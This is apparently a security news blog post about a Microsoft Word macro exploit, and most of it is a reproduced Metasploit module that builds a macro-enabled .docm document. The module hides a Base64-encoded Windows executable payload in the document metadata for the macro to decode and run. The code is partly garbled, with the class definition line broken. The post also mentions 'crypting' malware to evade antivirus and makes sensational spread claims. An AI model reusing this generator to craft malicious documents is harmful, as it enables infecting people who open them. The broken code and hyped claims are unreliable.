Microsoft Word Macro Execution 0day Exploit Found

An exploit in Microsoft Office Word has been discovered allowing hackers to execute malicious macro-based codes. Attackers can run the exploit in Metasploit and embed a macro virus into a Microsoft Word document.

According to WikiPedia:

A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, Excel, Power point allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in e-mails. Many antivirus programs can detect macro viruses, however they are still difficult to detect and its spread from the network.

A hacker injecting this exploit into a network of computers can be destructive. A virus such as this can spread like bacteria in a petri-dish. Especially in this day and age where files are always transferred from one computer to another, not just in schools but also at work places and of course amongst friends and families. The virus can spread to millions of computers within just a few months, weeks, days or even hours.

The exploit was uploaded to an exploit database by an internet user going by the alias of sinn3r, with the whole code being available for anyone to use. It is unsure whether sinn3r is the original author of the exploit as of yet.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'

class MetasploitModule "Microsoft Office Word Malicious Macro Execution",
'Description' => %q{
This module generates a macro-enabled Microsoft Office Word document. The comments
metadata in the data is injected with a Base64 encoded payload, which will be
decoded by the macro and execute as a Windows executable.

For a successful attack, the victim is required to manually enable macro execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r' # Metasploit
],
'References' =>
[
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => true
},
'Platform' => 'win',
'Targets' =>
[
['Microsoft Office Word', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jan 10 2012",
'DefaultTarget' => 0
))

register_options([
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
], self.class)
end

def on_file_read(short_fname, full_fname)
buf = File.read(full_fname)

case short_fname
when /document\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /core\.xml/
b64_payload = ' ' * 55
b64_payload << Rex::Text.encode_base64(generate_payload_exe)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
end

# The original filename of __rels is actually ".rels".
# But for some reason if that's our original filename, it won't be included
# in the archive. So this hacks around that.
case short_fname
when /__rels/
short_fname.gsub!(/\_\_rels/, '.rels')
end

yield short_fname, buf
end

def package_docm(path)
zip = Rex::Zip::Archive.new

Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')

if File.directory?(file)
print_status("Packaging directory: #{file}")
zip.add_file(p)
else
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}")
zip.add_file(fname, buf)
end
end
end

zip.pack
end

def exploit
print_status('Generating our docm file...')
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
docm = package_docm(path)
file_create(docm)
super
end
end

Viruses embedded into other forms and formats of files can also be easily go unnoticed by anti-viruses. Silent viruses and macro viruses such as this one can easily be made undetectable by a method called crypting. Methods such as these have existed since the very first virus was ever created. With time, hackers have gotten smarter and so have their destructive viruses and methods of undetectability.

Writer and content creator at The Hack Post. My adamant love for blogging, web development and programming has made me realise that contributing what I know is not only educative but also fun. Discussing topics with others is what drove me to become an author and I love every single moment of it. Founder of www.azhblog.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here